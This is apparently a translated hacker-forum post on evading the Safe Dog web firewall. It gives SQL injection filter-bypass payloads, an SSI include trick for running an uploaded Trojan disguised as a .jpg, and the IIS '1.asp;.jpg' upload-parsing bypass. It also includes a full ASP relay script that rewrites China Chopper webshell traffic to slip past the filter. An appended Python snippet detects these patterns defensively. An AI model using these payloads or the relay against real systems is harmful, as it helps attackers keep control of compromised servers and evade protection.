Is Safe Dog awesome?
What are the main aspects of Safe Dog:
1. Injection bypass
2. Access to the Trojan is blocked
3. Chopper connections to a one-line webshell are intercepted
4.x1.asp).jpg
Nothing else ..
Now, let's go through them one by one:
1. Injection bypass
Method 1: a.asp?aaa=%00&id=SQL statement
Method 2: a.asp?id= with %l added inside the words the security filter looks for in the SQL statement, for example: un%aion sel%aect, fr%aom admin
2. Access to the Trojan is blocked
Method 1: Upload a Trojan and access it at http://sss.com/dama.asp.
The solution is to rename dama.asp to dama.jpg, then upload a file da.asp to the same directory with the following content: <!--#include file="dama.jpg"-->. Accessed this way, da.asp will not be blocked.
3. Chopper connections to a one-line webshell are intercepted
Method 1: Do not use Chopper to connect to the one-line webshell; use a different one-line webshell client instead.
Method 2: Connect with Chopper, but replace the filtered words.
4.x1.asp).jpg
Method 1: 1.asp;.jpg
Method 2: Confidentiality
That is the summary for everyone. Safe Dog can basically be ignored!!
If you have anything to add, post it below!
The following script is used to connect Chopper past Safe Dog: put the script in a directory that can execute .asp.
Then access http://www.xx.com/asf.asp?dz=<the webshell address you want>
Enter that address in Chopper, use the password of the webshell you want to connect to, and select the type that matches the Trojan's file suffix.
For example: http://www.bkjia.com/asf.asp?dz=http://xxx.com/yijuhua.php plus the password
In this way, Chopper gets in.
This script currently supports connecting to .php and .aspx one-line webshells. .asp may not be tested yet. If anyone has a webshell on a host with Safe Dog installed, let me know. I will test again and modify this script so that all of them are supported!
<%
' Bypass principle: capture the packets Chopper sends to the webshell, work out which keywords Safe Dog filters, and replace those keywords!
JmStr = Replace(Request.Form, "$_POST", "$_REQUEST")
JmStr = Replace(JmStr, "->|", "-->|")
JmStr = Replace(JmStr, "@eval(", "@eval(")
JmStr = Replace(JmStr, "System.Convert.FromBase64String", "System.Convert.FromBase64String")
JMUrl = Request("dz")
Response.Write Request("dz")
JmRef = JMUrl
JmCok = ""
' Author: ghost Brother
' Chopper connection that breaks through Safe Dog!
' www.90sec.org
Response.Write PostData(JMUrl, JmStr, JmCok, JmRef)

' Forward the rewritten form body to PostUrl and return the response as a string.
Function PostData(PostUrl, PostStr, PostCok, PostRef)
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "POST", PostUrl, False
        .SetRequestHeader "Content-Length", Len(PostStr)
        .SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
        .SetRequestHeader "Referer", PostRef
        '.SetRequestHeader "Cookie", PostCok
        .Send PostStr
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function

' Convert a byte array to a string, treating bytes >= &H80 as the lead byte of a double-byte character.
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

' Percent-encode double-byte characters, spaces and "+" in a string.
Function URLEncoding(vstrin)
    strReturn = ""
    Dim I
    For I = 1 To Len(vstrin)
        ThisChr = Mid(vstrin, I, 1)
        If Abs(Asc(ThisChr)) < &HFF Then
            strReturn = strReturn & ThisChr
        Else
            InnerCode = Asc(ThisChr)
            If InnerCode < 0 Then
                InnerCode = InnerCode + &H10000
            End If
            Hight1 = (InnerCode And &HFF00) \ &HFF
            Low1 = InnerCode And &HFF
            strReturn = strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
        End If
    Next
    strReturn = Replace(strReturn, Chr(32), "%20") ' Convert spaces. If the website filters spaces, try replacing %20 with /**/.
    strReturn = Replace(strReturn, Chr(43), "%2B") ' jmdcw: added conversion of the + character
    ' strReturn = Replace(strReturn, filtered character, "replacement character") ' Add further characters to convert here.
    URLEncoding = strReturn
End Function
%>
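The request shapes in items 1 and 4 and the include file in item 2 can be triaged from the defender's side. The following Python is an added example, not part of the original post or its script: it flags those shapes in request targets and uploaded files. The sample inputs are constructed and the rule names are hypothetical.

```python
import re

# Constructed request targets modelled on the patterns in the list above,
# plus one benign line as a control.
SAMPLES = [
    "/a.asp?aaa=%00&id=1",
    "/a.asp?id=1 un%aion sel%aect fr%aom admin",
    "/upload/1.asp;.jpg",
    "/news.asp?id=42&title=caf%C3%A9",
]

# A '%' that does not start a valid two-hex-digit escape.
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
# A script extension followed by ';' inside one path segment.
SCRIPT_SEMI = re.compile(r"\.(?:aspx?|asa|cer|php)[^/]*;", re.I)
# An SSI include that pulls in a file with an image extension.
IMG_INCLUDE = re.compile(
    r'<!--\s*#\s*include\s+(?:file|virtual)\s*=\s*"[^"]+\.(?:jpe?g|gif|png)"', re.I)

def check_target(target):
    """Return the (hypothetical) rule names a request target trips."""
    path, _, query = target.partition("?")
    hits = []
    if "%00" in query or "\x00" in query:
        hits.append("nul-in-query")
    if BAD_ESCAPE.search(query):
        hits.append("malformed-escape")
    if SCRIPT_SEMI.search(path):
        hits.append("script-ext-semicolon")
    return hits

def check_upload(name, content):
    """Flag a script file whose body includes an image-named file."""
    is_script = re.search(r"\.(?:aspx?|asa|cer)$", name, re.I) is not None
    return is_script and IMG_INCLUDE.search(content) is not None

def triage(targets):
    """Map each flagged target to its hits; clean targets are omitted."""
    return {t: h for t in targets if (h := check_target(t))}

if __name__ == "__main__":
    for target, hits in triage(SAMPLES).items():
        print(f"{', '.join(hits):22} {target}")
    print(check_upload("da.asp", '<!--#include file="dama.jpg"-->'))
```

A ';' in a path can also be a legitimate path parameter, so the third rule is a triage signal to review rather than a block decision.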